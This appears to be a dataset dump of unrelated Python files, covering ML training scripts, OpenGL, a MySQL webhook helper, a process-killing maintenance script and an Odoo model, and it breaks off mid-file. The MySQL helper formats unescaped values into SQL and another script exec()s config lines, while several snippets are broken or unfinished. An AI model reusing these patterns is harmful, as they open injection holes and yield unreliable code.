text stringlengths 8 6.05M |
|---|
import maya.cmds as cmds
def rotateImage(objName, deg):
for x in range(0, 360/deg):
l = 'x'+str(x) + 'y0' + 'z0'
cmds.xform(objName, relative=True, translation=(deg, 0, 0) )
screenShot(objName, l)
def screenShot(objName, l):
ws = 'D:\\test'
wsp = ws + "/" + "images"
imageSnapshot = wsp + "/" + str(objName) + str(l) +".jpg"
cmds.refresh(cv=True, fe = "jpg", fn = imageSnapshot)
cmds.setAttr('defaultRenderGlobals.ren', 'mayaHardware2', type='string')
mel.eval('loadPreferredRenderGlobalsPreset("mayaHardware2")')
name = 'camera1'
l = 'starting'
screenShot(name, l)
rotateImage(name , 90) |
def digit_sum(n):
sum = 0
for i in str(n):
sum = sum + int(i)
return sum |
import sys, os
sys.path.insert(0, '../vision/')
sys.path.append('../')
from pytorch_segmentation_detection.datasets.pascal_voc import PascalVOCSegmentation
import pytorch_segmentation_detection.models.fcn as fcns
import pytorch_segmentation_detection.models.resnet_dilated as resnet_dilated
from pytorch_segmentation_detection.transforms import (ComposeJoint,
RandomHorizontalFlipJoint,
RandomScaleJoint,
CropOrPad,
ResizeAspectRatioPreserve)
import torch
import torchvision
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
import torchvision.transforms as transforms
import numbers
import random
from matplotlib import pyplot as plt
import numpy as np
from PIL import Image
from sklearn.metrics import confusion_matrix
def flatten_logits(logits, number_of_classes):
"""Flattens the logits batch except for the logits dimension"""
logits_permuted = logits.permute(0, 2, 3, 1)
logits_permuted_cont = logits_permuted.contiguous()
logits_flatten = logits_permuted_cont.view(-1, number_of_classes)
return logits_flatten
def flatten_annotations(annotations):
return annotations.view(-1)
def get_valid_annotations_index(flatten_annotations, mask_out_value=255):
return torch.squeeze(torch.nonzero((flatten_annotations != mask_out_value)), 1)
from pytorch_image_segmentation.transforms import RandomCropJoint
number_of_classes = 21
labels = range(number_of_classes)
train_transform = ComposeJoint(
[
RandomHorizontalFlipJoint(),
# RandomCropJoint(crop_size=(224, 224)),
# [ResizeAspectRatioPreserve(greater_side_size=384),
# ResizeAspectRatioPreserve(greater_side_size=384, interpolation=Image.NEAREST)],
# RandomCropJoint(size=(274, 274))
# RandomScaleJoint(low=0.9, high=1.1),
# [CropOrPad(output_size=(288, 288)), CropOrPad(output_size=(288, 288), fill=255)],
[transforms.ToTensor(), None],
# [transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), None],
[None, transforms.Lambda(lambda x: torch.from_numpy(np.asarray(x)).long())]
])
trainset = SplitData('datasets\split_data\\train',
joint_transform=train_transform)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=100,
shuffle=True, num_workers=4)
valid_transform = ComposeJoint(
[
[transforms.ToTensor(), None],
# [transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)), None],
[None, transforms.Lambda(lambda x: torch.from_numpy(np.asarray(x)).long())]
])
valset = SplitData('datasets\split_data\\val',
train=False,
joint_transform=valid_transform)
valset_loader = torch.utils.data.DataLoader(valset, batch_size=1,
shuffle=False, num_workers=2)
train_subset_sampler = torch.utils.data.sampler.SubsetRandomSampler(xrange(904))
train_subset_loader = torch.utils.data.DataLoader(dataset=trainset, batch_size=1,
sampler=train_subset_sampler,
num_workers=2)
# Define the validation function to track MIoU during the training
def validate():
fcn.eval()
overall_confusion_matrix = None
for image, annotation in valset_loader:
image = Variable(image.cuda())
logits = fcn(image)
# First we do argmax on gpu and then transfer it to cpu
logits = logits.data
_, prediction = logits.max(1)
prediction = prediction.squeeze(1)
prediction_np = prediction.cpu().numpy().flatten()
annotation_np = annotation.numpy().flatten()
# Mask-out value is ignored by default in the sklearn
# read sources to see how that was handled
current_confusion_matrix = confusion_matrix(y_true=annotation_np,
y_pred=prediction_np,
labels=labels)
if overall_confusion_matrix is None:
overall_confusion_matrix = current_confusion_matrix
else:
overall_confusion_matrix += current_confusion_matrix
intersection = np.diag(overall_confusion_matrix)
ground_truth_set = overall_confusion_matrix.sum(axis=1)
predicted_set = overall_confusion_matrix.sum(axis=0)
union = ground_truth_set + predicted_set - intersection
intersection_over_union = intersection / union.astype(np.float32)
mean_intersection_over_union = np.mean(intersection_over_union)
fcn.train()
return mean_intersection_over_union
def validate_train():
fcn.eval()
overall_confusion_matrix = None
for image, annotation in train_subset_loader:
image = Variable(image.cuda())
logits = fcn(image)
# First we do argmax on gpu and then transfer it to cpu
logits = logits.data
_, prediction = logits.max(1)
prediction = prediction.squeeze(1)
prediction_np = prediction.cpu().numpy().flatten()
annotation_np = annotation.numpy().flatten()
# Mask-out value is ignored by default in the sklearn
# read sources to see how that was handled
current_confusion_matrix = confusion_matrix(y_true=annotation_np,
y_pred=prediction_np,
labels=labels)
if overall_confusion_matrix is None:
overall_confusion_matrix = current_confusion_matrix
else:
overall_confusion_matrix += current_confusion_matrix
intersection = np.diag(overall_confusion_matrix)
ground_truth_set = overall_confusion_matrix.sum(axis=1)
predicted_set = overall_confusion_matrix.sum(axis=0)
union = ground_truth_set + predicted_set - intersection
intersection_over_union = intersection / union.astype(np.float32)
mean_intersection_over_union = np.mean(intersection_over_union)
fcn.train()
return mean_intersection_over_union
## Define the model and load it to the gpu
if __name__ == '__main__':
fcn = resnet_dilated.Resnet18_8s(num_classes=21)
fcn.load_state_dict(torch.load('resnet_18_8s_59.pth'))
res = fcn.resnet18_8s
for param in res.parameters():
param.requires_grad = False
res.fc = nn.Conv2d(res.inplanes, 3, 1)
res.fc.weight.data.normal_(0, 0.01)
res.fc.bias.data.zero_()
for param in res.fc.parameters():
param.requires_grad = True
fcn.cuda()
fcn.train()
# Uncomment to preserve BN statistics
# fcn.eval()
# for m in fcn.modules():
# if isinstance(m, nn.BatchNorm2d):
# m.weight.requires_grad = False
# m.bias.requires_grad = False
## Define the loss and load it to gpu
# optimizer = optim.Adam(filter(lambda p: p.requires_grad, fcn.parameters()), lr=0.00001, weight_decay=0.0005)
criterion = nn.CrossEntropyLoss(size_average=False).cuda()
optimizer = optim.Adam(fcn.parameters(), lr=0.0001, weight_decay=0.0001)
best_validation_score = 0
iter_size = 20
for epoch in range(30): # loop over the dataset multiple times
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
# get the inputs
img, anno = data
# We need to flatten annotations and logits to apply index of valid
# annotations. All of this is because pytorch doesn't have tf.gather_nd()
anno_flatten = flatten_annotations(anno)
index = get_valid_annotations_index(anno_flatten, mask_out_value=255)
anno_flatten_valid = torch.index_select(anno_flatten, 0, index)
# wrap them in Variable
# the index can be acquired on the gpu
img, anno_flatten_valid, index = Variable(img.cuda()), Variable(anno_flatten_valid.cuda()), Variable(
index.cuda())
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
logits = fcn(img)
logits_flatten = flatten_logits(logits, number_of_classes=21)
logits_flatten_valid = torch.index_select(logits_flatten, 0, index)
loss = criterion(logits_flatten_valid, anno_flatten_valid)
loss.backward()
optimizer.step()
# print statistics
running_loss += (loss.data[0] / logits_flatten_valid.size(0))
if i % 2 == 1:
loss_history.append(running_loss / 2)
loss_iteration_number_history.append(loss_current_iteration)
loss_current_iteration += 1
loss_axis.lines[0].set_xdata(loss_iteration_number_history)
loss_axis.lines[0].set_ydata(loss_history)
loss_axis.relim()
loss_axis.autoscale_view()
loss_axis.figure.canvas.draw()
running_loss = 0.0
current_validation_score = validate()
validation_history.append(current_validation_score)
validation_iteration_number_history.append(validation_current_iteration)
validation_current_iteration += 1
validation_axis.lines[0].set_xdata(validation_iteration_number_history)
validation_axis.lines[0].set_ydata(validation_history)
current_train_validation_score = validate_train()
train_validation_history.append(current_train_validation_score)
train_validation_iteration_number_history.append(train_validation_current_iteration)
train_validation_current_iteration += 1
validation_axis.lines[1].set_xdata(train_validation_iteration_number_history)
validation_axis.lines[1].set_ydata(train_validation_history)
validation_axis.relim()
validation_axis.autoscale_view()
validation_axis.figure.canvas.draw()
# Save the model if it has a better MIoU score.
if current_validation_score > best_validation_score:
torch.save(fcn.state_dict(), 'resnet_101_8s_best.pth')
best_validation_score = current_validation_score
print('Finished Training')
best_validation_score
|
from unittest import TestCase
from sorting import *
LIST_ONE = [1, 2, 3, 4, 5]
LIST_TWO = [5, 4, 3, 2, 1]
LIST_THREE = [3, 8, 1, 5, 2, 1, 13, 0]
SORTED_LIST_ONE = LIST_ONE[:]
SORTED_LIST_TWO = SORTED_LIST_ONE[:]
SORTED_LIST_THREE = [0, 1, 1, 2, 3, 5, 8, 13]
class MergeSortTests(TestCase):
def test_sort_1(self):
self.assertEqual(merge_sort([]), [])
def test_sort_2(self):
self.assertEqual(merge_sort([2]), [2])
def test_sort_3(self):
self.assertEqual(merge_sort([1, 2]), [1, 2])
def test_sort_4(self):
self.assertEqual(merge_sort([2, 1]), [1, 2])
def test_sort_5(self):
self.assertEqual(merge_sort(LIST_ONE), SORTED_LIST_ONE)
def test_sort_6(self):
self.assertEqual(merge_sort(LIST_TWO), SORTED_LIST_TWO)
def test_sort_7(self):
self.assertEqual(merge_sort(LIST_THREE), SORTED_LIST_THREE)
|
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#importing data set
dataset = pd.read_csv('breast_cancer.csv')
x = dataset.iloc[:,1:-1].values
y = dataset.iloc[:,-1].values
#split dataset
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.25)
print(x_test)
#train classifier
from sklearn.linear_model import LogisticRegression
cf = LogisticRegression(random_state=0)
cf.fit(x_train,y_train)
#predict
y_pred = cf.predict(x_test)
#print(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))
#confusion matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test,y_pred)
print(cm)
#scoring
from sklearn.metrics import accuracy_score
print(accuracy_score(y_test,y_pred)) |
# Реализуйте методы activation и summatory класса Neuron. Когда вы начнёте решать задачу, вам нужно будет просто скопировать соответствующую функцию, которую вы написали в ноутбуке (без учёта отступов; шаблон в поле ввода ответа уже будет, ориентируйтесь по нему). Сигнатура функции указана в ноутбуке, она остаётся неизменной.
# n — количество примеров, m — количество входов. Размерность входных данных input_matrix — (n, m), размерность вектора весов — (m, 1). vectorized_forward_pass должен возвращать массив формы (n, 1), состоящий из чисел (float). Мы будем проверять именно правильность ответа, который возвращает vectorized_forward_pass.
import numpy as np
def summatory(self, input_matrix):
return input_matrix.dot(self.w)
def activation(self, summatory_activation):
return self.activation_function(summatory_activation)
def vectorized_forward_pass(self, input_matrix):
return self.activation(self.summatory(input_matrix)) |
#!/usr/bin/env /data/mta/Script/Python3.8/envs/ska3-shiny/bin/python
#############################################################################################
# #
# check_prev_getnrt_process.py: kill getnrt process if the previous one is still running #
# #
# author: t. isobe (tisobe@cfa.harvard.edu) #
# #
# last update: Mar 04, 2021 #
# #
#############################################################################################
import sys
import os
import string
import re
import time
import random
#
#--- reading directory list
#
path = '/data/mta/Script/Dumps/Scripts/house_keeping/dir_list'
with open(path, 'r') as f:
data = [line.strip() for line in f.readlines()]
for ent in data:
atemp = re.split(':', ent)
var = atemp[1].strip()
line = atemp[0].strip()
exec("%s = %s" %(var, line))
#
#--- append path to a private folders
#
sys.path.append(bin_dir)
sys.path.append(mta_dir)
import mta_common_functions as mcf
#
#--- temp writing file name
#
rtail = int(time.time() * random.random())
zspace = '/tmp/zspace' + str(rtail)
#----------------------------------------------------------------------------
#-- check_prev_getnrt_process: kill getnrt process if the previous one is still running
#----------------------------------------------------------------------------
def check_prev_getnrt_process():
"""
kill getnrt process if the previous one is still running
input: none
output: none
"""
cmd = 'ps aux | grep mta | grep python | grep getnrt_control > ' + zspace
os.system(cmd)
pid_list = []
out = mcf.read_data_file(zspace, remove=1)
if len(out)> 1:
for ent in out:
mc = re.search('zspace', ent)
if mc is not None:
continue
atemp = re.split('\s+', ent)
cmd = 'kill -9 ' + atemp[1]
os.system(cmd)
#----------------------------------------------------------------------------
if __name__ == "__main__":
check_prev_getnrt_process()
|
class _PipeMeta(type):
def __new__(typ, *args, **kwargs):
import ipdb; ipdb.set_trace()
return super(_PipeMeta, typ).__new__(typ, *args, **kwargs)
class Pipe(object):
__metaclass__ = _PipeMeta
def __new__(cls, *args, **kwargs):
import ipdb; ipdb.set_trace()
return super(Pipe, cls).__new__(cls)
def __init__(self, *args, **kwargs):
import ipdb; ipdb.set_trace()
aaa = Pipe("5")
import ipdb; ipdb.set_trace() |
# -*- coding: utf-8 -*-
from __future__ import print_function
import numpy as np
import OpenGL.GL as gl
import itertools
#local imports
from common import SETTINGS, COLORS, VSYNC_PATCH_HEIGHT_DEFAULT,\
VSYNC_PATCH_WIDTH_DEFAULT
class VsyncPatch_Version1:
def __init__(self, left, bottom, width, height,
on_color = COLORS['white'],
off_color = COLORS['black'],
):
self.vertices = np.array(((left , bottom),
(left+width, bottom), #right bottom
(left+width, bottom + height), #right top
(left , bottom + height), #left top
))
self.left = left
self.bottom = bottom
self.width = width
self.height = height
self.on_color = on_color
self.off_color = off_color
self.t0 = None
self.vsync_value = None
self.ready_to_render = None
def start_time(self, t, vsync_value = 0):
self.t0 = t
self.vsync_value = vsync_value
self.ready_to_render = True
def update(self, t, dt):
#only update when ready
self.ready_to_render = True
def compute_bit_colors(self):
bit_colors = []
if self.vsync_value & 0b0001: #bit0, also the vsync trigger bit
bit_colors.append(self.on_color)
else:
bit_colors.append(self.off_color)
if self.vsync_value & 0b0010: #bit1
bit_colors.append(self.on_color)
else:
bit_colors.append(self.off_color)
if self.vsync_value & 0b0100: #bit2
bit_colors.append(self.on_color)
else:
bit_colors.append(self.off_color)
if self.vsync_value & 0b1000: #bit3
bit_colors.append(self.on_color)
else:
bit_colors.append(self.off_color)
return bit_colors
def render(self):
if not self.vsync_value is None:
left, bottom, width, height = (self.left,self.bottom,self.width,self.height)
bit_colors = self.compute_bit_colors()
gl.glLoadIdentity()
gl.glDisable(gl.GL_LIGHTING)
try:
#bit 0, sub square at bottom/right corner, also the vsync trigger bit
gl.glColor3f(*bit_colors[0])
gl.glRectf(left + width/2.0, bottom, left + width, bottom + height/2.0) #left,bottom -> right,top
#bit 1, sub square at bottom/left corner
gl.glColor3f(*bit_colors[1])
gl.glRectf(left, bottom,left + width/2.0, bottom + height/2.0) #left,bottom -> right,top
#bit 2, sub square at top/left corner
gl.glColor3f(*bit_colors[2])
gl.glRectf(left, bottom + height/2.0,left + width/2.0, bottom + height) #left,bottom -> right,top
#bit 3, sub square at top/right corner
gl.glColor3f(*bit_colors[3])
gl.glRectf(left + width/2.0, bottom + height/2.0,left + width, bottom + height) #left,bottom -> right,top
finally:
gl.glEnable(gl.GL_LIGHTING)
@classmethod
#define the vsync patch as being in the bottom right corner
def make_bottom_right(cls,
screen_bottom,
screen_right,
patch_width = VSYNC_PATCH_WIDTH_DEFAULT,
patch_height = VSYNC_PATCH_HEIGHT_DEFAULT,
):
obj = cls(left = screen_right - patch_width,
bottom = screen_bottom,
width = patch_width,
height = patch_height
)
return obj
class VsyncPatch_Version2:
""" The vSync code is sent as a timing between the start of two white
pulses, pulse_interval = VSYNC_TIMING_BASE*VSYNC_CODE.
"""
PULSE_DURATION = 4.0/60.0 #4 frames at 60 FPS
VSYNC_TIMING_BASE = 4.0/60.0 #4 frames at 60 FPS
VSYNC_PATCH_WIDTH_DEFAULT = 0.05
VSYNC_PATCH_HEIGHT_DEFAULT = 0.05
VSYNC_BACKGROUND_MARGIN = 0.05
def __init__(self, left, bottom, width, height,
on_color = COLORS['white'],
off_color = COLORS['black'],
display_rate = 144, #Hz
):
self.vertices = np.array(((left , bottom),
(left+width, bottom), #right bottom
(left+width, bottom + height), #right top
(left , bottom + height), #left top
))
self.left = left
self.bottom = bottom
self.width = width
self.height = height
self.on_color = on_color
self.off_color = off_color
self.ready_to_render = False
self.t0 = None
self._patch_color = None
self._pulse_active = False
self._pulse_interval = None
self._start_of_pulse_time = None
self._end_of_pulse_time = None
def start_time(self, t, vsync_value):
self.t0 = t
if vsync_value > 0:
#begin the first pulse
self._pulse_active = True
self._patch_color = self.on_color
self._pulse_interval = (vsync_value + 0.25)*self.VSYNC_TIMING_BASE
self._start_of_pulse_time = t
print("START:",t)
#print("\tpulse_interval =",self._pulse_interval)
else:
self._patch_color = self.off_color
self._pulse_interval = None
self._pulse_active = False
self.ready_to_render = True
def update(self, t, dt):
#control the pulse display when it is active
if self._pulse_active:
self.ready_to_render = True
pdt = t - self._start_of_pulse_time
if ( pdt >= self.PULSE_DURATION): #pulse period is over
print("PULSE OFF:",t - self.t0)
self._end_of_pulse_time = t
self._pulse_active = False
self._patch_color = self.off_color
elif (not self._pulse_interval is None):
pdt = t - self._end_of_pulse_time
if ( pdt >= self._pulse_interval): #begin final pulse, but not too early
print("END:",t - self.t0)
print("pdt =", pdt)
print("pdt/VSYNC_TIMING_BASE = %f" % (pdt/self.VSYNC_TIMING_BASE,))
self._pulse_active = True
self._patch_color = self.on_color
self._pulse_interval = None #invalidate for rest of epoch
self._start_of_pulse_time = t
self.ready_to_render = True
else:
self.ready_to_render = False
def render(self):
left, bottom, width, height = (self.left,self.bottom,self.width,self.height)
bg_margin = self.VSYNC_BACKGROUND_MARGIN
gl.glLoadIdentity()
gl.glDisable(gl.GL_LIGHTING)
try:
#draw the background which is always black
#bit 0, sub square at bottom/right corner, also the vsync trigger bit
gl.glColor3f(*self.off_color)
gl.glRectf(left - bg_margin, bottom - bg_margin, left + width + bg_margin, bottom + height + bg_margin) #left,bottom -> right,top
#draw the patch
#bit 0, sub square at bottom/right corner, also the vsync trigger bit
gl.glColor3f(*self._patch_color)
gl.glRectf(left, bottom, left + width, bottom + height) #left,bottom -> right,top
finally:
gl.glEnable(gl.GL_LIGHTING)
@classmethod
#define the vsync patch as being in the bottom right corner
def make_bottom_right(cls,
screen_bottom,
screen_right,
patch_width = None,
patch_height = None,
):
if patch_width is None:
patch_width = cls.VSYNC_PATCH_WIDTH_DEFAULT
if patch_height is None:
patch_height = cls.VSYNC_PATCH_HEIGHT_DEFAULT
obj = cls(left = screen_right - patch_width,
bottom = screen_bottom,
width = patch_width,
height = patch_height
)
return obj
|
'''
Created on Nov 25, 2014
@author: Idan
'''
if __name__ == '__main__':
pass
'''
P = number of samples
K1 =number of clusters
Iter1=number if itterations to finish
S=times of reexecution
'''
from k_mean_module import create_test_set1,my_k_means,plot_results,create_test_set2
P = 8000
K1 =4
Iter1=100
S=1
x1= create_test_set1(P,N=2,sig=1)
# x1= create_test_set2(P,N=2,sig1=1, sig2=0.25,q=0.70)
i=0# iterratuib start
S=S-i# itteration end+1
while i<S:
res1, centroids = my_k_means(x1, K1, Iter1)
# d = distance_from_means(centroids)
# a= distance_from_means(centroids,[ [2,3],[3,2],[4,1],[-1,0] ])
# print d
i+=1
plot_results(x1,res1,centroids) |
"""Modoboa - Mail hosting made simple."""
from pkg_resources import DistributionNotFound, get_distribution
try:
__version__ = get_distribution(__name__).version
except DistributionNotFound:
# package is not installed
pass
def modoboa_admin():
from modoboa.core.commands import handle_command_line
handle_command_line()
|
# -*- coding: utf-8 -*-
'''测试python方法重名的情况'''
#python中没有方法的重载,定义多个同名的方法,只有最后一个有效。
class Person:
def say_hi(self):
print("hello!")
def say_hi(self,name):
print("{0},hello".format(name))
p1 = Person()
#p1.say_hi() #运行报错。TypeError: say_hi() missing 1 required positional argument: 'name'
p1.say_hi('fanwei') |
from datetime import datetime
import MySQLdb
import configparser
import logging
logging.basicConfig(handlers=[logging.FileHandler('/var/www/pow/pow.log', 'a', 'utf-8')],
level=logging.INFO)
# Read config and parse constants
config = configparser.ConfigParser()
config.read('/var/www/pow/config.ini')
# DB connection settings
DB_HOST = config.get('webhooks', 'host')
DB_USER = config.get('webhooks', 'user')
DB_PW = config.get('webhooks', 'password')
DB_SCHEMA = config.get('webhooks', 'schema')
DB_PORT = config.get('webhooks', 'db_port')
def get_db_data(db_call):
"""
Retrieve data from DB
"""
db = MySQLdb.connect(host=DB_HOST, port=int(DB_PORT), user=DB_USER, passwd=DB_PW, db=DB_SCHEMA, use_unicode=True,
charset="utf8")
db_cursor = db.cursor()
db_cursor.execute(db_call)
db_data = db_cursor.fetchall()
db_cursor.close()
db.close()
return db_data
def set_db_data(db_call):
"""
Enter data into DB
"""
db = MySQLdb.connect(host=DB_HOST, port=int(DB_PORT), user=DB_USER, passwd=DB_PW, db=DB_SCHEMA, use_unicode=True,
charset="utf8")
db_cursor = db.cursor()
try:
db_cursor.execute(db_call)
db.commit()
db_cursor.close()
db.close()
except MySQLdb.ProgrammingError as e:
logging.info("{}: Exception entering data into database".format(datetime.now()))
logging.info("{}: {}".format(datetime.now(), e))
db_cursor.close()
db.close()
raise e
def bulk_client_update(clients):
"""
Provide a bulk insert for the client list
"""
# First, delete all the clients in the table
delete_client_table = "DELETE FROM client_list"
set_db_data(delete_client_table)
# Next, reset auto increment to 1
auto_call = "ALTER TABLE client_list AUTO_INCREMENT = 1"
set_db_data(auto_call)
# Then, update the client table with all provided clients
create_row_call = ("INSERT INTO client_list (client_id, client_address, client_type, "
"client_demand_count, client_precache_count) VALUES ")
try:
for index, client in enumerate(clients):
if index == 0:
create_row_call = create_row_call + ("('{}', '{}', '{}', {}, {})".format(client['client_id'],
client['client_address'],
client['client_type'].upper(),
client['client_demand_count'],
client['client_precache_count']
)
)
else:
create_row_call = create_row_call + (" , ('{}', '{}', '{}', {}, {})".format(client['client_id'],
client['client_address'],
client['client_type'].upper(),
client['client_demand_count'],
client['client_precache_count']
)
)
set_db_data(create_row_call)
except Exception as e:
logging.info("{}: Exception inserting clients into database".format(datetime.now()))
logging.info("{}: {}".format(datetime.now(), e))
raise e
logging.info("Clients set successfully in DB.")
def bulk_service_update(services):
"""
Provide a bulk insert for the service list
"""
# First, delete all the clients in the table
delete_service_table = "DELETE FROM service_list"
set_db_data(delete_service_table)
# Then, update the client table with all provided clients
create_row_call = "INSERT INTO service_list (service_id, service_name, service_web) VALUES "
try:
for index, service in enumerate(services):
if service['service_id'] is not None:
id = service['service_id'].replace("'", "''")
else:
id = service['service_id']
if service['service_name'] is not None:
name = service['service_name'].replace("'", "''")
else:
name = service['service_name']
if service['service_web'] is not None:
web = service['service_web'].replace("'", "''")
else:
web = service['service_web']
if index == 0:
if (name == 'null' and web != 'null') or (name is None and web is not None):
create_row_call = create_row_call + ("('{}', Null, '{}')".format(id, web))
elif (name == 'null' and web == 'null') or (name is None and web is None):
create_row_call = create_row_call + ("('{}', Null, Null)".format(id))
elif name != 'null' and web == 'null' or (name is not None and web is None):
create_row_call = create_row_call + ("('{}', '{}', Null)".format(id, name))
else:
create_row_call = create_row_call + ("('{}', '{}', '{}')".format(id, name, web))
else:
if (name == 'null' and web != 'null') or (name is None and web is not None):
create_row_call = create_row_call + (", ('{}', Null, '{}')".format(id, web))
elif (name == 'null' and web == 'null') or (name is None and web is None):
create_row_call = create_row_call + (", ('{}', Null, Null)".format(id))
elif (name != 'null' and web == 'null') or (name is not None and web is None):
create_row_call = create_row_call + (", ('{}', '{}', Null)".format(id, name))
else:
create_row_call = create_row_call + (", ('{}', '{}', '{}')".format(id, name, web))
set_db_data(create_row_call)
except Exception as e:
logging.info("{}: Exception inserting services into database".format(datetime.now()))
logging.info("{}: {}".format(datetime.now(), e))
raise e
logging.info("Services set successfully in DB.") |
from __future__ import print_function
import tensorflow as tf
import numpy as np
from src.main.utils.decorators import lazy_property
from src.main.dataset.datasets import Datasets
class Config:
"""Holds model hyperparams and data information.
The config class is used to store various hyperparameters and dataset
information parameters. Model objects are passed a Config() object at
instantiation.
"""
def __init__(self, feature_num: int, batch_size: int = 50, epoche: int = 100, learning_rate: float = 0.1):
self.epoche = epoche
self.learning_rate = learning_rate
self.batch_size = batch_size
self.feature_num = feature_num
class Parameters:
"""Holds model parameters
The Parameters class is used to store weights and bias values. If this initial
values will not be levegered, the Model class sets them randomly.
"""
def __init__(self, weights=None, bias=None):
self.weights = weights
self.bias = bias
class Model:
"""Model Class for supervised machine learning models.
The Model class is the main structure almost all
supervised models in Machine learning should follow.
Attributes
----------
dataset : str
a formatted string to print out what the animal says
config : Config
the name of the animal
parameters : Parameters
the sound that the animal makes
Methods
-------
weights : tf.Variable
variable for weight parameters
bias : tf.Variable
variable for bias parameters
prediction : tf.Tensor
Model prediction hypothesis
cost : tf.Tensor
Model cost function
optimization : tf.Tensor
Model optimization method
error : tf.Tensor
Model error calculation
train: str
Model training execution
test: str
Model testing execution
save:
Save training and testing results in json file.
"""
def __init__(self, dataset: Datasets, config: Config, parameters: Parameters = Parameters()):
self.config = config
self.parameters = parameters
self.dataset = dataset
self.weights
self.bias
self.prediction
self.cost
self.optimization
self.error
@lazy_property
def weights(self):
"""Initial weights.
The Parameters class is used to store weight values. If this initial
values will not be levegered, the Model class sets them randomly.
"""
if self.parameters.weights is not None:
return tf.Variable(self.parameters.weights,
name="weights",
dtype=tf.float32)
else:
random_weights = np.random.rand(self.config.feature_num, 1)
return tf.Variable(random_weights,
name="weights",
dtype=tf.float32)
@lazy_property
def bias(self):
"""Initial bias.
The Parameters class is used to store bias values. If this initial
values will not be levegered, the Model class sets them randomly.
"""
if self.parameters.bias is not None:
return tf.Variable(self.parameters.bias,
name="weights",
dtype=tf.float32)
else:
random_bias = np.random.rand(1, 1)
return tf.Variable(random_bias,
name="weights",
dtype=tf.float32)
@lazy_property
def prediction(self):
"""Model prediction hypothesis.
This method mainly depends on the choosen weights and bias.
Cost and optimization methods will help to improve weights and bias.
"""
raise NotImplementedError("Each Model needs a prediction method.")
@lazy_property
def cost(self):
"""Model cost function.
This methods evaluates quantitaively how much the prediction
is away from the "historical" truth.
"""
raise NotImplementedError("Each Model needs a cost method.")
@lazy_property
def optimization(self):
"""Model optimization method.
This method implements a manner to optimize weights and bias by
minimizing the cost function.
"""
raise NotImplementedError("Each Model needs a optimization method.")
@lazy_property
def error(self):
"""Validation function.
This function evaluates the final output. In regression analysis this
will be mainly the cost function, but in classification analysis this
may be the accuracy.
"""
raise NotImplementedError("Each Model needs an error method.")
def training(self, session):
""" Model training execution.
This function evalues the final output. In regression analysis this
will be mainly the cost function, but in classification analysis this
may be the accuracy.
"""
for epoch in range(self.config.epoche):
session.run([self.dataset.training_data_op.initializer])
while True:
try:
_, error=session.run([self.optimization, self.error])
except tf.errors.OutOfRangeError:
break
print('Epoch {:2d} error {}'.format(epoch + 1, error))
def test(self):
"""Model test execution.
"""
# raise NotImplementedError("Each Model needs a test method.")
def save(self,
link,
sess,
global_step=None,
latest_filename=None,
meta_graph_suffix="meta",
write_meta_graph=True,
write_state=True,
strip_default_attrs=False):
"""Saves Model parameters
This method runs the ops added by the constructor for saving variables.
It requires a session in which the graph was launched. The variables to
save must also have been initialized.
The method returns the path prefix of the newly created checkpoint files.
This string can be passed directly to a call to `restore()`.
"""
save=tf.train.Saver()
save.save(
sess=sess,
save_path=link,
global_step=global_step,
latest_filename=latest_filename,
meta_graph_suffix=meta_graph_suffix,
write_meta_graph=write_meta_graph,
write_state=write_state,
strip_default_attrs=strip_default_attrs
)
|
import sys
import os
import csv
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
reu_path = "C:/Users/Daway Chou-Ren/Documents/REU/"
fromDir = sys.argv[1]
toDir = sys.argv[2]
with open(reu_path + fromDir, "rb") as csv_file:
reader = csv.reader(csv_file)
row_length = len(reader.next())
for a in range(1, row_length):
for row in reader:
for b in range(1, row_length):
if (a == b):
print row[b]
# print a
# with open(reu_path + toDir, "wb") as new_csv:
# writer = csv.writer(new_csv)
# writer.writerow(mean_values)
# writer.writerow(std_dev_values)
|
#Group Anagrams
#High Time Complexity
class Solution(object):
def groupAnagrams(self, strs):
res = []
resfreq = []
for s in strs:
freqs = [0]*26
for l in s:
freqs[ord(l)-97] += 1
found = -1
for i in range(len(resfreq)):
if resfreq[i] == freqs:
found = i
break
if found == -1:
res.append([s])
resfreq.append(freqs)
else:
res[found] += [s]
return res
class Solution(object):
def groupAnagrams(self, strs):
mp = {}
for s in strs:
key = ''.join(sorted(s))
if key in mp:
mp[key].append(s)
else:
mp[key] = [s]
ans = []
for key in mp:
ans.append(mp[key])
return ans |
# import pandas as pd
# df = pd.read_csv("/home/spaceman/my_work/Most-Recent-Cohorts-Scorecard-Elements.csv")
# df=df[['STABBR']]
# print df['STABBR'].value_counts(normalize=True)
import random
all = ['a', 'b', 'c']
letters = dict(
a = {1:'q', 2:'w', 3:'e'},
b = {1:'f', 2:'g', 3:'h'},
c = {1:'s', 2:'d', 3:'f'}
)
choice = input("enter a, b, or c: ")
randomVar = random.randint(1, 3)
answer = letters[str(choice)][randomVar] # this is the line in question
print(answer) |
#
# Copyright (C) 2020-2030 Thorium Corp FP <help@thoriumcorp.website>
#
from odoo import api, fields, models
# from odoo.modules import get_module_resource
from odoo.exceptions import ValidationError
class ThoriumcorpPatient(models.Model):
_name = 'thoriumcorp.patient'
_description = 'Patient'
_inherit = 'thoriumcorp.abstract_entity'
identification_code = fields.Char(
string='Identificación interna',
help='Identificación del paciente provista por el centro de salud',
)
general_info = fields.Text(
string='Información General',
)
is_pregnant = fields.Boolean(
help='¿Esta embarazada?',
)
blood_type = fields.Selection(
[('A', 'A'), ('B', 'B'), ('AB', 'AB'), ('O', 'O')],
string='Blood Type',
sort=False,
compute='patient_blood_info'
)
rh = fields.Selection(
[('+', '+'), ('-', '-')],
string='Rh',
compute='patient_blood_info'
)
hb = fields.Selection(
[
('aa', 'AA'),
('as', 'AS'),
('ss', 'SS'),
('sc', 'SC'),
('cc', 'CC'),
('athal', 'A-THAL'),
('bthal', 'B-THAL')
],
string='Hb',
computed='patient_blood_info'
)
critical_summary = fields.Text(
'Important medical conditions related to this patient',
help='Automated summary of patient important medical conditions '
'other critical information')
critical_info = fields.Text(
